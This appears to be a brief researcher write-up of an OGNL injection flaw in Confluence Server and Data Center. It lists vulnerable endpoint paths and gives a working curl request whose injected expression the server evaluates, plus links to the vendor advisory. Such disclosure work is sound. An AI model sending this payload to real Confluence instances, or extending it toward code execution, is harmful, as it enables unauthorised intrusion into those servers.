An OGNL injection vulnerability exists that would allow an authenticated user, and in some instances unauthenticated user, to execute arbitrary code on a Confluence Server or Data Center instance.
My fight to locate the entrypoints and injections XD
| Fight (1) | Fight (2) |
|---|---|
 |
 |
Finally confluence Entrypoints Exploited
https://<REDACTED>/users/user-dark-features
https://<REDACTED>/login
https://<REDACTED>/pages/templates2/viewpagetemplate.action
https://<REDACTED>/template/custom/content-editor
https://<REDACTED>/templates/editor-preload-container
https://<REDACTED>/pages/createpage-entervariables.action
My first manual inspection: Note: Pre-Authenticated user
# curl -i -s -k -X $'POST' -H $'Host: <REDACTED>' -H $'User-Agent: alex666' -H $'Connection: close' -H $'Content-Type: application/x-www-form-urlencoded' -H $'Content-Length: 44' -b $'JSESSIONID=<REDACTED>' --data-binary $'queryString=alt3kx\\u0027%2b#{6*666}%2b\\u0027' $'https://<REDACTED>/pages/createpage-entervariables.action'
Server Response:
HTTP/1.1 200
X-ASEN: <REDACTED>
Expires: Thu, 01 Jan 1970 00:00:00 GMT
<REDACTED>
[../snip]
<input type="hidden" name="queryString" value="alt3kx{3996=null}" />
https://jira.atlassian.com/browse/CONFSERVER-67940
https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html
Amazing writeup posted here:
https://github.com/httpvoid/writeups/blob/main/Confluence-RCE.md
Some hints very useful by:
@wvuuuuuuuuuuuuu
@iamnoooob
Alex Hernandez aka (@_alt3kx_)